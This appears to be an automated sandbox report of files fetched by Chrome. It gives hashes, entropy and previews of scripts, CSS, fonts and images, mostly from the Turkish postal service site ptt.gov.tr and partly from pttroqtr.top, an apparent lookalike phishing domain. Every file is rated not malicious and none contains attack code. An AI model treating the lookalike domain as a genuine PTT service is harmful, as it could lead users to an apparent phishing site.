                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3352],{4007:function(e,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/doviz-kurlari",function(){return r(7170)}])},7170:function(e,n,r){"use strict";r.r(n),r.d(n,{__N_SSP:function(){return x}});var s=r(3288),c=(r(2466),r(3475)),i=r.n(c),t=r(8082),l=r(3395),d=r(3230),u=r(4926),a=r.n(u),h=r(1395),_=(r(8966),r(4087)),o=new(r.n(_)());o.set("currencies",null),o.set("currencies_time",null);var x=!0;n.default=function(e){var n=e.currencies,r=(0,t.Z)("GetLanguageResourceResponse").t;return(0,h.useRouter)(),(0,s.jsxs)(s.Fragment,{children:[(0,s.jsx)(a(),{children:(0,s.jsxs)("title",{children:[r(l.My.TITLE)," | ",r(l.My.EXCHANGE_RATE)]})}),(0,s.jsxs)("div",{className:i().container,children:[(0,s.jsx)("div",{className:i().header,children:(0,s.jsx)("h1",{children:r(l.My.EXCHANGE_RATE)})}),n&&(0,s.jsxs)("table",{className:i().table,children:[(0,s.jsx)("thead",{children:(0,s.jsxs)("tr",{children:[(0,s.jsx)("th",{children:r(l.My.CURRENCY_CO
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18369)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):18593
                                                                                                                                                                                            Entropy (8bit):5.712888637345886
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:xE+fKMCY42wpgfvlqjUU4Qar3OTLc6rZ0opgTMFIowsPN:xEhFpWqjUURCeTo6rZ0/T+IoV
                                                                                                                                                                                            MD5:615C089C71C979729E2BCF60A61D7934
                                                                                                                                                                                            SHA1:4A3FCB37162D27CFCC228E4606266F98354D77E4
                                                                                                                                                                                            SHA-256:A8D792CFA16979C7A84EB1BDBB4107885941F7901C25944EA96EE2863FC42406
                                                                                                                                                                                            SHA-512:C0DB5C73DF1E01CC845BF365CA3702D2358D983DCC7C8E86283734BDD38F0D2DAC2C3D3AF14BB59927C435DB8CFB37B62A6DE09C3A36A4206F4D65F1E3FE3ADD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*!. * UAParser.js v0.7.21. * Lightweight JavaScript-based User-Agent string parser. * https://github.com/faisalman/ua-parser-js. *. * Copyright . 2012-2019 Faisal Salman <f@faisalman.com>. * Licensed under MIT License. */.(function(window,undefined){"use strict";var LIBVERSION="0.7.21",EMPTY="",UNKNOWN="?",FUNC_TYPE="function",UNDEF_TYPE="undefined",OBJ_TYPE="object",STR_TYPE="string",MAJOR="major",MODEL="model",NAME="name",TYPE="type",VENDOR="vendor",VERSION="version",ARCHITECTURE="architecture",CONSOLE="console",MOBILE="mobile",TABLET="tablet",SMARTTV="smarttv",WEARABLE="wearable",EMBEDDED="embedded";var util={extend:function(regexes,extensions){var mergedRegexes={};for(var i in regexes){if(extensions[i]&&extensions[i].length%2===0){mergedRegexes[i]=extensions[i].concat(regexes[i])}else{mergedRegexes[i]=regexes[i]}}return mergedRegexes},has:function(str1,str2){if(typeof str1==="string"){return str2.toLowerCase().indexOf(str1.toLowerCase())!==-1}else{return false}},lowerize:function
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):30631
                                                                                                                                                                                            Entropy (8bit):5.451614488686303
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:6uh0PW5XQYmdwp7s0PT/dmMEV8W8G8O8m8X8i:6uh0PW5g8brTLMi
                                                                                                                                                                                            MD5:7B1185FCEFAA4A825AA4D19BE81C803D
                                                                                                                                                                                            SHA1:3E82385C35C08C783CCC4B80EAABF5996BA998A0
                                                                                                                                                                                            SHA-256:3B1A2A415EE2C1F98E6DA2DE536BE6E7DBA5DFCA738D718D4EC8314317FC5D05
                                                                                                                                                                                            SHA-512:2A0CD86507AEB9F5261C6980034189318BEE604AA6B923B3EB697B2CE4CD02295DFD335F7FC7777CC7DB5BAB649379593533516CD1582F801E50F780C7667647
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/css/google_fonts.css
                                                                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU49qqjgSE.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;. }. /* cyrillic */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU4_6qjgSE.woff2) format('woff2');. unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;. }. /* greek-ext */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU496qjgSE.woff2) format('woff2');. unicode-range: U+1F00-1FFF;. }. /* greek */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. sr
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11518
                                                                                                                                                                                            Entropy (8bit):7.966291743818182
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:+WG04lslf+6LDQ0v2M635Hz0xvFzzahp0y4BTHzWnMDfjVO/IwlQmn3C3WbQ1R:+Ef+I0i2T1zgzaXXWCqsQmny3WbO
                                                                                                                                                                                            MD5:2CC5743A1A8F6BC6384F081849BAC3FD
                                                                                                                                                                                            SHA1:70E5ED0109BCA40261543210C5A178C7FFC29633
                                                                                                                                                                                            SHA-256:7AC38EAC2CC2002FEBE7613E3DF10786A9BB95AB401C4D8EAE3D0319551AF8A2
                                                                                                                                                                                            SHA-512:8FA2808DEAD785B6B387151F1BE53A70E3AA8F53BAEA3B3E24D2791D2EBF10478E0441B2190BD49907113B26632CAD854EED28118CB368087980A264AD2613E3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:RIFF.,..WEBPVP8X...........5..ALPH.%....C @...?........j.M;.Cf. Q"...9.J.&.g.....8..W<........}.D...._....?5...hk..w.....l..p..U..P....z_>k.S.[U-......m..Zuk..`n.z.V&.j......}=.b........x..".%..:P}F*Jr.E..I...u.PqK.m.....t........ .=/&..V%.....*.y<?X.....<n..39..I..t.6......w^,t..l.r..A.N......$...tu.......@MQ.s* ....KX.jWIf?....S......A.m.....6.....l.c.)..H.>.M.\....=...UoYI2.1.Z..=g>!.d.,(kr.-.&..3aa.np......4lWy'.U.....>...X....rp...DwCI.U..C..P... ,...I.+...v.>t7V.T..O.V..s/.CPD/..W.V$W..|.xv7u..S$...1....<..........l......y.t1._.......jO\h5G.6..2..N.t7....}...s..<y...o.]m.:..T..*..Z._....'.......f....J..<G:{..'....d1...q.m..6.1/..q._.....'+..K>]6[........V.gW...yZ^H.8Z.B.Z.......8_.B.Z ...|.S......P...+.f......G.,.....|yUS.._..P....5.^^....X(]..e[.{ZT.....P....^L.X....G...s..%.Y.....y. H2..-...X(Y.f.1.n.[. \..g...{....v...*...S;..If......D.....d..].. \.........Q.N......;..I.3...."..d.]'{u........6.w.p"....x.:.......[.$..pm.D..B.n
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):268233
                                                                                                                                                                                            Entropy (8bit):5.5734544187755555
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0C1pmFU7dlq04d7G3BsEemveONeH0fxnQe:LeW7dQnhiLj
                                                                                                                                                                                            MD5:D18195475B2C6A0F3331649A90B2595C
                                                                                                                                                                                            SHA1:7A7C6BB0410DD3458E68918937BD6EC319B206FF
                                                                                                                                                                                            SHA-256:68A18C1D04EA99C59CC3EC1D145F7750069BE3BCB9B1D9A570FB09CE395DB3E4
                                                                                                                                                                                            SHA-512:6B5A7E35EDCF9B4FE195C709B5399320009489E6797FC6156EDFFB27BDA78BAECAC47BCCF43BEDDB04019922D2640D64CAE90F03FE1A95A871FF4A7E139D4808
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-SFQ172Y7CH
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","ptt\\.gov\\.tr"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1796)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1844
                                                                                                                                                                                            Entropy (8bit):5.124498212737441
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:SxVEH8QSvyC5uCWJInOsqd1k+fZn1KS5RfzxCvjVsVBYy+O5RxNsEY:ONQb63srrcLV8BYnaK
                                                                                                                                                                                            MD5:10800D610AD0DA14D639E1EF53FC527F
                                                                                                                                                                                            SHA1:67417D0D27D41EB12C408E66BA49BF0DCC941F9F
                                                                                                                                                                                            SHA-256:67F07E5FC8E60833DC9B6978741EC98252526BDBAA6B5738FE80849C58636E51
                                                                                                                                                                                            SHA-512:92EAF6B5F3ED5F321FF51FC631FF45476F21AB041CE767C76721B9B61FC3B302EE5FD5A99ACFA7737B9B1D1090A6309829B56144086F98CC5C5AB24E82EB042E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/386d6f9094f2dfbc.css
                                                                                                                                                                                            Preview:.styles_container__ogyrU{padding:2rem;margin:0 auto;display:flex;flex-direction:column;align-items:center;overflow:auto}.styles_header__EPk94{display:flex;justify-content:left;padding-bottom:1rem}.styles_container__ogyrU>.styles_header__EPk94>h1{font-size:1.5rem}.styles_container__ogyrU>div.styles_disclaimer__1RacZ{border-bottom:1px solid rgba(39,2,2,.2);padding:1rem;margin-bottom:2rem;text-align:left;display:flex;justify-content:center}.styles_table__D3nIx{text-align:center;margin:auto;min-width:70%;border-collapse:collapse;border-radius:1rem;overflow:hidden}.styles_table__D3nIx>thead>tr>th{padding:1rem;border-right:4px solid hsla(0,0%,100%,.2);border-top:1px solid var(--pttYellowColor);color:#000;text-align:center;font-size:1rem}.styles_table__D3nIx>thead>tr>th:last-child{border-right:none}.styles_table__D3nIx>thead>tr:first-child{background-color:#ffc72c86;height:40px}.styles_table__D3nIx>thead{border-radius:1rem}.styles_table__D3nIx>tbody{background-color:#f8f8f8}.styles_table__D3n
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format, TrueType, length 62844, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):62844
                                                                                                                                                                                            Entropy (8bit):7.991698062787078
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:JrXBaLm85xBAFLdZ20ZcY8EWebeHsTPj+Ha81:1RD8PBMZQ0ZcYi/19
                                                                                                                                                                                            MD5:963EB32907744D9A0D6B98127162808F
                                                                                                                                                                                            SHA1:C7ACBCE006E0C9139608F078CBE3B0876C9ACE66
                                                                                                                                                                                            SHA-256:8560F9BDDDAA5E89F2D1D1403681932C574DE5377C6D0DD5C1AA408C91A3E979
                                                                                                                                                                                            SHA-512:0BE3BB5FCEFF7C79758DEF92108E8737D1590459CD16940966D2DBB2AE094A408429FCD1F0774DFEC4623B9E316CDA17A575D858AAA1ED8BBE31D293C23167D4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/8560f9bdkFGym.woff
                                                                                                                                                                                            Preview:wOFF.......|................................FFTM............].(ZGDEF........... ....GPOS....... ... l.t.GSUB............H...OS/2.......^...`..]cmap......."...~.*..cvt ...4...4...4....fpgm...h.......e../.gasp................glyf...$......_ ..i0head.......3...6.4.lhhea...0...!...$....hmtx...T........H.M.loca...L...:...d...@maxp...... ... ....name...........%N@.post..........p..$Kprep...........;............o1.....B.........Mx.c`d``..b...`b..7.I.0.....................latn................x.]RMk.Q.=oN.4..@....qQ.(.*d..R.L.)]...L.e&F.~jm......~.U.M.K....R. ""...Bz..(.s..~.;.....|.rK~....;..H_v.@......6..FDTQ.../b...J.w..q\r+W].V.=tC.Wr}.=.|.F./.,x....wL.V...vA...6s.._..O.a..].F/2.....F1...<....?..-...7.>l.J...JI..B|.w|.m.H<.A|.>..U..Hp....4g8...9..<....|.G|.g|....@.....x....'~.7...y.....5a5.?..sE.+..i..\.:7..W|.7...Z\. )J.:.[..d.....M]K..=.G.....E\....$N.x.H....O..P...g.......9.y[f..a.p..$.aU0G_0k&....`..x.c`f.......:....Q.B3_dHc|................B4.....3.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):44008
                                                                                                                                                                                            Entropy (8bit):7.959695770661982
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:jich1+kvACQ6+XRoonVs3sruEET2QAqHDBucmp7aaDkkNRWGKPRkU+:FE6+B9OsrlEonfaaDDRWGKPRkU+
                                                                                                                                                                                            MD5:F29E09E7EB1220F3B89EB5F7C6E70C0F
                                                                                                                                                                                            SHA1:EFE3BD42DD2920662239EE8A7915B1AB4A030A1C
                                                                                                                                                                                            SHA-256:72F4F765EE364C8CABDDC25B48E28DB60BF229B3807EF78BEE1127F9AD157AD7
                                                                                                                                                                                            SHA-512:B4E600B9BA6918BF68524BF3CFE9103B931C1EAAE92F94A3B57E3CF57DDD692831BAACE501A96B971948A12162E1A6BF26460E40B2661E5B1D4F602BAE4BC158
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/46.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...uIDATx....de.....s........A`...J....pUt..kB.........l..I..HN.0..0......U]9.......{zf:Tw.g>5.....:.=.Ur....a..a......0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0....1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0.S)<U.Z#..T..s%..V...v..S..1.......!q.P.......!qJ...5....0,q..0*O....j....y..l..$gz1S.I)+lE.....w{...N.4~.A....n.Qq.aq......$.0,q..,va#A.b..V,k..)%b......e..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):15215
                                                                                                                                                                                            Entropy (8bit):7.966328191753387
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
                                                                                                                                                                                            MD5:7BB31B9EF5F35D816F9BC7A816C800D7
                                                                                                                                                                                            SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
                                                                                                                                                                                            SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
                                                                                                                                                                                            SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):929
                                                                                                                                                                                            Entropy (8bit):4.797071649336984
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:Y6uel1mf1zLXAWYP1+ezafLaZ0RSrHKm7wDKJb7VP9:YHzXAlnafjrm75J99
                                                                                                                                                                                            MD5:A1897091D57541A9E237EED5D3B0D200
                                                                                                                                                                                            SHA1:CD10F028D0939070C64BAA563BF564C19E292630
                                                                                                                                                                                            SHA-256:F898E77082F95F770AF246DD933818642232FACF671CAD0331DE04B9AF095566
                                                                                                                                                                                            SHA-512:9E9884841907667703DD7F2C7A196AB871231AB35CFC96C310ED44D28790D488D9BDFD778020B78A5B6359CA22F15D0CDEF468DBB8E8D8027C5B9516D333DF4D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"success": true, "data": {"legal_requirements": false, "customer_path": null, "ws_server": "chatserver.alo-tech.com", "lang": "tr", "optional_email": true, "optional_phone": false, "hide_email": false, "hide_phone_number": false, "title": "Canl\u0131 Destek", "title_background_color": "FFFFFF", "title_text_color": "00A7CF", "subtitle": "Canl\u0131 Destek", "height": 500, "width": 350, "widget_version": "version1", "sys_nickname": "PTT", "chat_widget_icon": "chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png", "is_chat_widget_icon": true, "send_chat_history_to_customer": "", "widget_type": "alotech", "is_chat_widget_logo": false, "chat_widget_logo": null, "tenant_language": "tr", "optional_subject_choice": true, "widget_status": "online", "hide_new_chat_form": false, "file_upload_disabled": false, "send_emoji_disabled": false, "set_custom_library_properties": "", "is_speech_to_text": true, "is_python3": true}}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):7852
                                                                                                                                                                                            Entropy (8bit):7.701456268374696
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ymBhN4ABVRD1ibtmQrEoD+V+ma6UsleVC:ymTBXWmQ4o6V+mloC
                                                                                                                                                                                            MD5:28C2C809EB83262A1F928F4E821E8F4C
                                                                                                                                                                                            SHA1:AA9B9E2A285AE91583FB4EC2C6234DB478B79540
                                                                                                                                                                                            SHA-256:EFEA9410B633A1E3B80FDE6E1EF291E28BBA38FA4451B3A81D91786A0DBFFBF5
                                                                                                                                                                                            SHA-512:13D6B52E45B07242F1C031F7F25B8C0495DB864289AD0083DAF347FB9C1B4D032D78D039F38BF0AF72F8EEBB6E5802C5C92B7ECEAB09B405F7B083D0E212D3EE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx...Or.F..`d*..........*K+..L...D9...D>A....*.2..N...#.S5....m...".i.._..S..#.T..~.?o....W....'B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B.... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B....'....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q....?k..7.....y..._o....q..o..K.<^...7M..i1.....x.6...?.u...Z...8..oG.Yax{p...V..!.~....v._..M...5...}...AxK..f....~].]s.....o.....I........8..o.d.y...WO*=q. .....<.....z....`8.m..q.Z....q.#...o?5..v.4V.......m..U.w]...._?....W..Q..v...).Z...8..p..!s...O3'...N.....c...r!..5..........
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (8553)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8603
                                                                                                                                                                                            Entropy (8bit):5.505168367455742
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:WUfNSKCPJ0CPUKifrDHRg08uWWEf48YPdQAvWsO:NFCWC4frzRg9uWWEjYPd3vWsO
                                                                                                                                                                                            MD5:693D625BF6DCB19233FA453121AC097B
                                                                                                                                                                                            SHA1:0268601F6FDCD6E9B6D5F54F1E1D04BE80D873C1
                                                                                                                                                                                            SHA-256:5B0D75DFC33845B54D6E819B246C64AFDD6D5DF770A8A44D3B583D4787D099E9
                                                                                                                                                                                            SHA-512:3AC7AE96A989E52D90865052235B361DBDD6E2246E752F822E19ABE09BB7B919BA87AC99EB327234ED797BE1FC961982491B9A6CBFD74197DFCFDA76E51B8488
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9348],{9348:function(e,n,t){"use strict";t.d(n,{Z:function(){return j}});var r=t(3288),a=t(2466),s=t(8845),o=t(4820),i=t.n(o),l=t(6731),c=t.n(l),u=t(3395),y=t(3230),d=t(8082),p=t(3283),_=function(e){return{type:u.MF.GET_ANNOUNCEMENT_COUNT,payload:e}},m=function(e){return{type:u.MF.GET_ANNOUNCEMENT_TYPE,payload:e}},f=t(3868),N=t.n(f),h=function(){var e=(0,d.Z)("GetLanguageResourceResponse").t;return(0,r.jsxs)("div",{className:N().container,children:[(0,r.jsx)("h1",{className:N().title,children:e(u.My.NO_DATA)}),(0,r.jsxs)("div",{className:N().iconContainer,children:[(0,r.jsx)("i",{className:"fa-solid fa-paperclip"}),(0,r.jsx)("i",{className:"fa-solid fa-newspaper"}),(0,r.jsx)("i",{className:"fa-solid fa-bullhorn"}),(0,r.jsx)("i",{className:"fa-solid fa-note-sticky"}),(0,r.jsx)("i",{className:"fa-solid fa-paper-plane"}),(0,r.jsx)("i",{className:"".concat(N().face," fa-solid fa-face-rolling-eyes")})]})]})},E=t(1395);function T(e,n){
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1796)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1844
                                                                                                                                                                                            Entropy (8bit):5.124498212737441
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:SxVEH8QSvyC5uCWJInOsqd1k+fZn1KS5RfzxCvjVsVBYy+O5RxNsEY:ONQb63srrcLV8BYnaK
                                                                                                                                                                                            MD5:10800D610AD0DA14D639E1EF53FC527F
                                                                                                                                                                                            SHA1:67417D0D27D41EB12C408E66BA49BF0DCC941F9F
                                                                                                                                                                                            SHA-256:67F07E5FC8E60833DC9B6978741EC98252526BDBAA6B5738FE80849C58636E51
                                                                                                                                                                                            SHA-512:92EAF6B5F3ED5F321FF51FC631FF45476F21AB041CE767C76721B9B61FC3B302EE5FD5A99ACFA7737B9B1D1090A6309829B56144086F98CC5C5AB24E82EB042E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.styles_container__ogyrU{padding:2rem;margin:0 auto;display:flex;flex-direction:column;align-items:center;overflow:auto}.styles_header__EPk94{display:flex;justify-content:left;padding-bottom:1rem}.styles_container__ogyrU>.styles_header__EPk94>h1{font-size:1.5rem}.styles_container__ogyrU>div.styles_disclaimer__1RacZ{border-bottom:1px solid rgba(39,2,2,.2);padding:1rem;margin-bottom:2rem;text-align:left;display:flex;justify-content:center}.styles_table__D3nIx{text-align:center;margin:auto;min-width:70%;border-collapse:collapse;border-radius:1rem;overflow:hidden}.styles_table__D3nIx>thead>tr>th{padding:1rem;border-right:4px solid hsla(0,0%,100%,.2);border-top:1px solid var(--pttYellowColor);color:#000;text-align:center;font-size:1rem}.styles_table__D3nIx>thead>tr>th:last-child{border-right:none}.styles_table__D3nIx>thead>tr:first-child{background-color:#ffc72c86;height:40px}.styles_table__D3nIx>thead{border-radius:1rem}.styles_table__D3nIx>tbody{background-color:#f8f8f8}.styles_table__D3n
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (8553)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):8603
                                                                                                                                                                                            Entropy (8bit):5.505168367455742
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:WUfNSKCPJ0CPUKifrDHRg08uWWEf48YPdQAvWsO:NFCWC4frzRg9uWWEjYPd3vWsO
                                                                                                                                                                                            MD5:693D625BF6DCB19233FA453121AC097B
                                                                                                                                                                                            SHA1:0268601F6FDCD6E9B6D5F54F1E1D04BE80D873C1
                                                                                                                                                                                            SHA-256:5B0D75DFC33845B54D6E819B246C64AFDD6D5DF770A8A44D3B583D4787D099E9
                                                                                                                                                                                            SHA-512:3AC7AE96A989E52D90865052235B361DBDD6E2246E752F822E19ABE09BB7B919BA87AC99EB327234ED797BE1FC961982491B9A6CBFD74197DFCFDA76E51B8488
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/9348-b9f3a774e6fafc61.js
